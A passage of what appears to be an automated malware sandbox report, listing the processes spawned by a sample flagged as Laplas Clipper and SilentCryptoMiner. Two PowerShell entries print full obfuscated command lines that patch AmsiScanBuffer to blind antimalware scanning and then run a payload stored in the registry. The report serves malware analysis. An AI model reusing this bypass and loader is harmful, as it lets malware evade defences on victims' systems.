                                                                                                  Imagebase:0x10000
                                                                                                  File size:187'904 bytes
                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:34
                                                                                                  Start time:13:13:51
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:35
                                                                                                  Start time:13:13:55
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  Imagebase:0xbe0000
                                                                                                  File size:831'814'656 bytes
                                                                                                  MD5 hash:60EF19D1B9B74D6AAD6007EBBF88CDF3
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000023.00000002.2992259011.0000000000B4A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  Has exited:false

                                                                                                  Target ID:37
                                                                                                  Start time:13:13:58
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\dialer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\dialer.exe
                                                                                                  Imagebase:0x7ff7e3080000
                                                                                                  File size:39'936 bytes
                                                                                                  MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  Target ID:38
                                                                                                  Start time:13:13:59
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''
+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](114)+''+[Char](74)+''+[Char](69)+''+[Char](69)+''+[Char](85)+''+[Char](99)+''+'T'+'');$WfnyPndttaFlQY=$fxvCjurJEEUcT.GetMethod(''+[Char](87)+''+[Char](102)+'n'+'y'+''+'P'+''+'n'+''+'d'+''+'t'+''+'t'+''+[Char](97)+''+[Char](70)+'l'+[Char](81)+'Y',[Reflection.BindingFlags]''+[Char](80)+'u'+'b'+'l'+'i'+''+[Char](99)+''+','+''+[Char](83)+'ta'+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JjiXXwpbbbrjfbPnDMc=NGLbonfBsuNR @([String])([IntPtr]);$BLVFENqGmioLfqvbpVmToD=NGLbonfBsuNR 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LGtHULICQkP=$fxvCjurJEEUcT.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+'e'+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$MCfPqlHPuVRchK=$WfnyPndttaFlQY.Invoke($Null,@([Object]$LGtHULICQkP,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$OyytwRheaSYqFgycC=$WfnyPndttaFlQY.Invoke($Null,@([Object]$LGtHULICQkP,[Object]('Vir'+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$TWYbqKR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MCfPqlHPuVRchK,$JjiXXwpbbbrjfbPnDMc).Invoke(''+[Char](97)+'m'+'s'+'i'+'.'+''+[Char](100)+''+[Char](108)+'l');$yVOcIkghuDjvLnFeb=$WfnyPndttaFlQY.Invoke($Null,@([Object]$TWYbqKR,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'f'+[Char](102)+'er')));$uCYiRUffMm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OyytwRheaSYqFgycC,$BLVFENqGmioLfqvbpVmToD).Invoke($yVOcIkghuDjvLnFeb,[uint32]8,4,[ref]$uCYiRUffMm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$yVOcIkghuDjvLnFeb,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OyytwRheaSYqFgycC,$BLVFENqGmioLfqvbpVmToD).Invoke($yVOcIkghuDjvLnFeb,[uint32]8,0x20,[ref]$uCYiRUffMm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+''+'l'+''+'e'+'rsta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                  Imagebase:0x530000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  Target ID:39
                                                                                                  Start time:13:13:59
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:40
                                                                                                  Start time:13:13:59
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char]
(80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[Char](85)+'s'+[Char](87)+''+[Char](74)+'B'+[Char](110)+''+[Char](77)+'');$xKuInBktgkPNhs=$mrsNZvUsWJBnM.GetMethod(''+'x'+'Ku'+[Char](73)+''+'n'+''+[Char](66)+''+[Char](107)+''+[Char](116)+''+'g'+'k'+[Char](80)+''+'N'+'h'+'s'+'',[Reflection.BindingFlags]'Pub'+'l'+''+'i'+''+'c'+''+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hpDOMeMRBRCuAUuldah=QgCYtqphZUyk @([String])([IntPtr]);$lBJaJRBvBxDAIBOClAwhdJ=QgCYtqphZUyk 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zPFNVuWfmpd=$mrsNZvUsWJBnM.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$TxJrEjJObcCpmZ=$xKuInBktgkPNhs.Invoke($Null,@([Object]$zPFNVuWfmpd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$bZvPuqWGWAxchxpvH=$xKuInBktgkPNhs.Invoke($Null,@([Object]$zPFNVuWfmpd,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+'o'+[Char](116)+'e'+[Char](99)+'t')));$jweDifO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TxJrEjJObcCpmZ,$hpDOMeMRBRCuAUuldah).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$fOCXrgjBAURvBdTAm=$xKuInBktgkPNhs.Invoke($Null,@([Object]$jweDifO,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+'uf'+[Char](102)+'e'+'r'+'')));$tTEVvGnGYm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bZvPuqWGWAxchxpvH,$lBJaJRBvBxDAIBOClAwhdJ).Invoke($fOCXrgjBAURvBdTAm,[uint32]8,4,[ref]$tTEVvGnGYm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOCXrgjBAURvBdTAm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bZvPuqWGWAxchxpvH,$lBJaJRBvBxDAIBOClAwhdJ).Invoke($fOCXrgjBAURvBdTAm,[uint32]8,0x20,[ref]$tTEVvGnGYm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+
'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000028.00000002.2555004791.000001C52EB9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000028.00000002.2236987878.000001C51E800000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  Target ID:41
                                                                                                  Start time:13:13:59
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:42
                                                                                                  Start time:13:14:02
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\dllhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
                                                                                                  Imagebase:0x7ff70f330000
                                                                                                  File size:21'312 bytes
                                                                                                  MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:43
                                                                                                  Start time:13:14:03
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\winlogon.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:winlogon.exe
                                                                                                  Imagebase:0x7ff7cd660000
                                                                                                  File size:906'240 bytes
                                                                                                  MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:44
                                                                                                  Start time:13:14:03
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\lsass.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\lsass.exe
                                                                                                  Imagebase:0x7ff7a2ae0000
                                                                                                  File size:59'456 bytes
                                                                                                  MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:45
                                                                                                  Start time:13:14:04
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:46
                                                                                                  Start time:13:14:04
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\dwm.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"dwm.exe"
                                                                                                  Imagebase:0x7ff74e710000
                                                                                                  File size:94'720 bytes
                                                                                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:47
                                                                                                  Start time:13:14:08
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:48
                                                                                                  Start time:13:14:08
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:49
                                                                                                  Start time:13:14:08
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:50
                                                                                                  Start time:13:14:08
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:51
                                                                                                  Start time:13:14:09
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:52
                                                                                                  Start time:13:14:09
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:53
                                                                                                  Start time:13:14:10
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:54
                                                                                                  Start time:13:14:12
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:55
                                                                                                  Start time:13:14:13
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:56
                                                                                                  Start time:13:14:13
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:57
                                                                                                  Start time:13:14:13
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false


                                                                                                    Execution Graph

                                                                                                    Execution Coverage:12.2%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:50%
                                                                                                    Total number of Nodes:6
                                                                                                    Total number of Limit Nodes:0

                                                                                                    Callgraph


                                                                                                     Control-flow Graph
